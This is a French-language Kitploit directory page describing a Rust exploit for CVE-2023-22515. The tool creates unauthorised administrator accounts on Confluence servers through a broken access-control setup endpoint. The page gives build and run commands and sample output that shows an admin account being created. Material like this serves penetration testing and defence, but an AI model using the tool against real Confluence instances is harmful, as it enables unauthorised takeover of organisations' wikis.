Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-22515-joaoviictorti — Exploit basé sur Rust pour CVE-2023-22515 qui crée des comptes administrateur non autorisés dans Confluence Server et Data Center via un contrôle d'accès défaillant. | Kitploit
Outils/GitHubGitHub/killvxk/cve-2023-22515-joaoviictorti
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionRed Teaming
GitHubkillvxk/cve-2023-22515-joaoviictorti

CVE-2023-22515-joaoviictorti

Exploit basé sur Rust pour CVE-2023-22515 qui crée des comptes administrateur non autorisés dans Confluence Server et Data Center via un contrôle d'accès défaillant.

Voir le dépôt
3il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2023-22515

  • Vue d'ensemble
  • Compilation
  • Utilisation
  • Exécution de CVE-2023-22515

Vue d'ensemble

Confluence est un wiki d'entreprise basé sur le web développé par la société australienne Atlassian. Atlassian a été informé d'un problème signalé par certains clients selon lequel des attaquants externes auraient pu exploiter une vulnérabilité jusqu'alors inconnue dans des serveurs Confluence et des instances de centres de données accessibles au public afin de créer des comptes administrateur Confluence non autorisés et d'accéder aux instances Confluence.

La vulnérabilité a été classée comme CVE-2023-22515

Compilation

Effectuez d'abord la compilation avec la commande :

root@kitploit:~
cargo build --release

Utilisation

Vous pouvez procéder de ces deux manières :

root@kitploit:~
cargo run -- --target http://localhost --username "teste" --password "teste" 
root@kitploit:~
.\target\release\cve_2023_22515 --target http://localhost --username "teste" --password "teste" 

Cela affichera l'aide de l'outil. Voici tous les paramètres qu'il prend en charge :

root@kitploit:~
CVE-2023-22515

Usage: CVE_2023_22515 --target <TARGET> --username <USERNAME> --password <PASSWORD>

Options:
  -t, --target <TARGET>      Insérer la cible
  -u, --username <USERNAME>  Insérer le nom d'utilisateur
  -p, --password <PASSWORD>  Insérer le mot de passe
  -h, --help                 Afficher l'aide

Exécution de CVE-2023-22515

root@kitploit:~
cargo run -- --target http://example.com --username "teste" --password "teste" 

[!] Requête pour : http://example.com/setup/setupadministrator.action
[!] Création du compte administrateur
[!] Vérification de la réponse
[+] Nom d'utilisateur créé avec succès : teste
[+] Mot de passe créé avec succès : teste
[+] Exploit terminé avec succès !!
Télécharger l’outil